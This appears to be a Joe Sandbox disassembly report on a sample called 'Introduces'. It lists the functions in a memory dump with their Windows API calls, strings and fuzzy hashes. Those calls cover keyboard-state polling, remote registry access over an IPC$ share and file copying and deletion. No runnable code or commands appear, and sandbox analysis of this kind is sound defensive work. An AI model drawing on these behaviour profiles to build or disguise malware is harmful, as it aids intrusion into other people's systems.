Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7c0e7fe31caae287f2dce39e1f6c1960e97497177c50954f07d759841aab3324
Instruction ID: 0fb2224fb1f6b3b744e7ec115c46b95ecb62576ae60a25a1db9617137ca93c91
Opcode Fuzzy Hash: 7c0e7fe31caae287f2dce39e1f6c1960e97497177c50954f07d759841aab3324
Instruction Fuzzy Hash: 86516972904309EFCB15CFA8DC85EAEBBB9EF48350F14851DF94AA7250D731A945CB60

Function 00A5A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A5A4D4

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00A5A4F6
__swprintf.LIBCMT ref: 00A5A54F
__swprintf.LIBCMT ref: 00A5A568
_wprintf.LIBCMT ref: 00A5A61E
_wprintf.LIBCMT ref: 00A5A63C

Strings

Line %d (File "%s"):, xrefs: 00A5A549, 00A5A562
^ ERROR, xrefs: 00A5A5C0
"%s" (%d) : ==> %s:%s%s, xrefs: 00A5A619
"%s" (%d) : ==> %s:, xrefs: 00A5A637
Error: , xrefs: 00A5A5E6

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 98103919de0bf308acd4eae3146637901db137e62243c27d248c89d1069dc7b8
Instruction ID: a3a012a18d72778b94ac59e8b02673a9cd07dd8cf196649b9bd5cf3656541f03
Opcode Fuzzy Hash: 98103919de0bf308acd4eae3146637901db137e62243c27d248c89d1069dc7b8
Instruction Fuzzy Hash: B0517E72900119BACF15EBE0DE86EEEB779BF18341F104265F505620A2EB316F59CB61

Function 00A59710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5951A: __time64.LIBCMT ref: 00A59524

Part of subcall function 00A04A8C: _fseek.LIBCMT ref: 00A04AA4

__wsplitpath.LIBCMT ref: 00A597EF

Part of subcall function 00A1431E: __wsplitpath_helper.LIBCMT ref: 00A1435E

_wcscpy.LIBCMT ref: 00A59802
_wcscat.LIBCMT ref: 00A59815
__wsplitpath.LIBCMT ref: 00A5983A
_wcscat.LIBCMT ref: 00A59850
_wcscat.LIBCMT ref: 00A59863

Part of subcall function 00A59560: _memmove.LIBCMT ref: 00A59599
Part of subcall function 00A59560: _memmove.LIBCMT ref: 00A595A8

_wcscmp.LIBCMT ref: 00A597AA

Part of subcall function 00A59CF1: _wcscmp.LIBCMT ref: 00A59DE1
Part of subcall function 00A59CF1: _wcscmp.LIBCMT ref: 00A59DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A59A0D
_wcsncpy.LIBCMT ref: 00A59A80
DeleteFileW.KERNEL32(?,?), ref: 00A59AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A59ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A59ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A59AEF

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: d598dbef2620d3af01b7ba005c4d2e1c4d70d0bf65f9eaa9634749c59f891f19
Instruction ID: 63df7423146ff20ab4df7a305c28e1b7d583585a8ed0cc3bbd391409bb1fdcae
Opcode Fuzzy Hash: d598dbef2620d3af01b7ba005c4d2e1c4d70d0bf65f9eaa9634749c59f891f19
Instruction Fuzzy Hash: 8FC13BB1900219AADF11DF94CD85ADFB7BDFF48350F0040AAFA09E6151EB709A898F65

Function 00A05BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A05BF1
GetMenuItemCount.USER32(00AB7890), ref: 00A40E7B
GetMenuItemCount.USER32(00AB7890), ref: 00A40F2B
GetCursorPos.USER32(?), ref: 00A40F6F
SetForegroundWindow.USER32(00000000), ref: 00A40F78
TrackPopupMenuEx.USER32(00AB7890,00000000,?,00000000,00000000,00000000), ref: 00A40F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A40F97

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 2e6f062cd3e818c2088f95ab9d16cbce1bde51fae80b911039426386d9db6e82
Instruction ID: 18cfad931de9fb700bd12b3f985204f62163572483b647ce0dfe819dab1e4019
Opcode Fuzzy Hash: 2e6f062cd3e818c2088f95ab9d16cbce1bde51fae80b911039426386d9db6e82
Instruction Fuzzy Hash: 2971F334A04609BFFB208B64DC85FAABF64FF45324F244216FA146A1D1C7B16C64EB90

Function 00A483FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

_memset.LIBCMT ref: 00A48489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A484BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A484DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A484F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A48520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00A48548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A48553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A48558

Strings

SOFTWARE\Classes\, xrefs: 00A4842A
\IPC$, xrefs: 00A484A0
\CLSID, xrefs: 00A48440

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 5e14866c7559c57f3f87cb4cf7eb9e167414dff849a60848a2a8e1ac2d22585e
Instruction ID: cef6247e998692d84cb8222d53d4116531208e3af55c30f17caf90d298784ad9
Opcode Fuzzy Hash: 5e14866c7559c57f3f87cb4cf7eb9e167414dff849a60848a2a8e1ac2d22585e
Instruction Fuzzy Hash: AC41F576C1022DABCF12EBE4ED95DEDB7B8BF58340F004529E805A31A1EB359E05CB90

Function 00A7147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7040D,?,?), ref: 00A71491

Strings

HKEY_USERS, xrefs: 00A71592
HKLM, xrefs: 00A7150F
HKCC, xrefs: 00A7155F
HKCR, xrefs: 00A71539
HKU, xrefs: 00A715A3
HKEY_CURRENT_CONFIG, xrefs: 00A7154E
HKEY_CURRENT_USER, xrefs: 00A71570
HKCU, xrefs: 00A71581
HKEY_LOCAL_MACHINE, xrefs: 00A714FA
HKEY_CLASSES_ROOT, xrefs: 00A71524

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: fae7e30129ba276d35a3866bba999e5fe3695440673664622046743e1a46f1c3
Instruction ID: 0fa42a11891538aa244d4e9caa2b5612479eea89eebe573bd6c88358cd5f37fc
Opcode Fuzzy Hash: fae7e30129ba276d35a3866bba999e5fe3695440673664622046743e1a46f1c3
Instruction Fuzzy Hash: 1A413C7160025ACFDF04EF94ED41AEA37A4BF62310F508415FC565B292DB70ED9ACB61

Function 00A55882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

Part of subcall function 00A0153B: _memmove.LIBCMT ref: 00A015C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A558EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A55901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A55912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A55924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A55935

Strings

play PlayMe wait, xrefs: 00A5591F
alias PlayMe, xrefs: 00A558C4
open , xrefs: 00A5589A
close PlayMe, xrefs: 00A558FC, 00A55929
status PlayMe mode, xrefs: 00A558E6
play PlayMe, xrefs: 00A55930

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 1829816c95d8233c831403d3bef2bf55bc50dfec3eb1a1789e545b3de45aa42e
Instruction ID: 2432a56110d5d62c5cd218826b0e851ca1daa9a2f6a2fd4ae0277bea06dd8e4b
Opcode Fuzzy Hash: 1829816c95d8233c831403d3bef2bf55bc50dfec3eb1a1789e545b3de45aa42e
Instruction Fuzzy Hash: 6B11863195011DF9DB10A7A1EC5ADFF7B7CFB92B51F400829B811970D1DB701904C5B0

Function 00A54C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A54C27
gethostname.WSOCK32(?,00000100), ref: 00A54C41
gethostbyname.WSOCK32(?), ref: 00A54C4E
_wcscpy.LIBCMT ref: 00A54C76
_memmove.LIBCMT ref: 00A54C89
inet_ntoa.WSOCK32(?), ref: 00A54C94
_strcat.LIBCMT ref: 00A54CA2
_wcscpy.LIBCMT ref: 00A54CB9
WSACleanup.WSOCK32 ref: 00A54CC7
_wcscpy.LIBCMT ref: 00A54CD5

Strings

0.0.0.0, xrefs: 00A54C70

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: a8f99333c301d48f26237f809af6b5008a0ead8feccab0ea856d47a4de2c0d0a
Instruction ID: 4fde47536647c4dccb2c3985ba9a3d373e2d27b4f9c66fb41c79be7638dbc81b
Opcode Fuzzy Hash: a8f99333c301d48f26237f809af6b5008a0ead8feccab0ea856d47a4de2c0d0a
Instruction Fuzzy Hash: 3C115931904108AFDB51F7749D4AEEA77BCEF84715F0001A5F84496092EF70D9CA8BA0

Function 00A55530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A55535

Part of subcall function 00A10859: timeGetTime.WINMM(?,00000002,009FC22C), ref: 00A1085D

Sleep.KERNEL32(0000000A), ref: 00A55561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00A55585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A555A7
SetActiveWindow.USER32 ref: 00A555C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A555D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 00A555F3
Sleep.KERNEL32(000000FA), ref: 00A555FE
IsWindow.USER32 ref: 00A5560A
EndDialog.USER32(00000000), ref: 00A5561B

Strings

BUTTON, xrefs: 00A55599

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0ea2f5f3c27ec338b9b20780ed309d7ad8d64bf2bffbd099b56ea274bdff0861
Instruction ID: ef498fb4f610f6026bdd97e6f11c68021c5549c292eb441e5f17b90914d8079e
Opcode Fuzzy Hash: 0ea2f5f3c27ec338b9b20780ed309d7ad8d64bf2bffbd099b56ea274bdff0861
Instruction Fuzzy Hash: D5219570504604AFE791EBF4ED99F293B6EFB44346F041214F80281172DB755D5ADB71

Function 00A5DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

CoInitialize.OLE32(00000000), ref: 00A5DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A5DCC0
SHGetDesktopFolder.SHELL32(?), ref: 00A5DCD4
CoCreateInstance.OLE32(00A83D4C,00000000,00000001,00AAB86C,?), ref: 00A5DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A5DD8F
CoTaskMemFree.OLE32(?,?), ref: 00A5DDE7
_memset.LIBCMT ref: 00A5DE24
SHBrowseForFolderW.SHELL32(?), ref: 00A5DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A5DE83
CoTaskMemFree.OLE32(00000000), ref: 00A5DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A5DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 00A5DEC3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: e04fe07a4a2ee875c5596bf658ffc639f68cbd726e412f7167f2d3b1a48dc2c4
Instruction ID: 4837cb45ef96d3eb40126ac2e47c1c430abc513ad106fc034811b015d40dca4a
Opcode Fuzzy Hash: e04fe07a4a2ee875c5596bf658ffc639f68cbd726e412f7167f2d3b1a48dc2c4
Instruction Fuzzy Hash: F3B1DA75A00109AFDB14DFA4C989DAEBBB9FF88305F148459F909EB261DB30EE45CB50

Function 00A5081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A50896
SetKeyboardState.USER32(?), ref: 00A50901
GetAsyncKeyState.USER32(000000A0), ref: 00A50921
GetKeyState.USER32(000000A0), ref: 00A50938
GetAsyncKeyState.USER32(000000A1), ref: 00A50967
GetKeyState.USER32(000000A1), ref: 00A50978
GetAsyncKeyState.USER32(00000011), ref: 00A509A4
GetKeyState.USER32(00000011), ref: 00A509B2
GetAsyncKeyState.USER32(00000012), ref: 00A509DB
GetKeyState.USER32(00000012), ref: 00A509E9
GetAsyncKeyState.USER32(0000005B), ref: 00A50A12
GetKeyState.USER32(0000005B), ref: 00A50A20

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a9daed6e5254914a7aeb72008c22e58e25a40e7b00169123b4a031f463ad0967
Instruction ID: 4fc6f93fade39063878b904f7a31e3095d1da53b0a4553ca7e6503883795bb78
Opcode Fuzzy Hash: a9daed6e5254914a7aeb72008c22e58e25a40e7b00169123b4a031f463ad0967
Instruction Fuzzy Hash: DF51997090478469FB35DBB08915FAABFB4AF11381F088599DDC2571C3DA749A8CCBA1

Function 00A4CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00A4CE1C
GetWindowRect.USER32(00000000,?), ref: 00A4CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A4CE8C
GetDlgItem.USER32(?,00000002), ref: 00A4CE97
GetWindowRect.USER32(00000000,?), ref: 00A4CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A4CEFD
GetDlgItem.USER32(?,000003E9), ref: 00A4CF0B
GetWindowRect.USER32(00000000,?), ref: 00A4CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A4CF5F
GetDlgItem.USER32(?,000003EA), ref: 00A4CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A4CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 00A4CF97

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: beaf6456320e98ab6fc3112b482cc6f991cdd373aa2f51dfbac128202e4a4889
Instruction ID: f09e65e0c8e6b4d6dad7c0411dda99c8c6037c7b2036d65ac7cbff1e8a4e0add
Opcode Fuzzy Hash: beaf6456320e98ab6fc3112b482cc6f991cdd373aa2f51dfbac128202e4a4889
Instruction Fuzzy Hash: 96515375B00205AFDB58CFA9CD85EAEBBB6EF88710F14812DF519D7290D770AD058B50

Function 009F23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 009F1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009F2412,?,00000000,?,?,?,?,009F1AA7,00000000,?), ref: 009F1F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009F24AF
KillTimer.USER32(-00000001,?,?,?,?,009F1AA7,00000000,?,?,009F1EBE,?,?), ref: 009F254A
DestroyAcceleratorTable.USER32(00000000), ref: 00A2BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009F1AA7,00000000,?,?,009F1EBE,?,?), ref: 00A2C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009F1AA7,00000000,?,?,009F1EBE,?,?), ref: 00A2C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009F1AA7,00000000,?,?,009F1EBE,?,?), ref: 00A2C04B
DeleteObject.GDI32(00000000), ref: 00A2C05D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 12ed1887c14dd0443246092c609db5cf02751d0b6748747841d5af7d63aac38a
Instruction ID: 6a82df0de66e53327c919bcb015fe01cfdd23468dcfcc85cfa43773b7a2541e5
Opcode Fuzzy Hash: 12ed1887c14dd0443246092c609db5cf02751d0b6748747841d5af7d63aac38a
Instruction Fuzzy Hash: 9961AC30108618DFDB25DF98DD48B3A77B1FB84322F108A28E14657AB0C7B5AC92DF91

Function 009F2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 009F29AB: GetWindowLongW.USER32(?,000000EB), ref: 009F29BC

GetSysColor.USER32(0000000F), ref: 009F25AF

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a6f0263feab38da571f422cb20e1961a8d5deaa36a32ce5913d75b555e7e0e46
Instruction ID: 89b1c2c9e35e5a4d5a1eb98e3a46ff66c7d718f2cb11afa37f5bf7c6e4650370
Opcode Fuzzy Hash: a6f0263feab38da571f422cb20e1961a8d5deaa36a32ce5913d75b555e7e0e46
Instruction Fuzzy Hash: A041C331004158AFDB259F68DC88BB93B65EB4A335F194362FE65CE1E6D7308C42EB21

Function 00A029BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00A10B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A02A3E,?,00008000), ref: 00A10BA7

Part of subcall function 00A10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A02A58,?,00008000), ref: 00A102A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A02ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00A02C2C

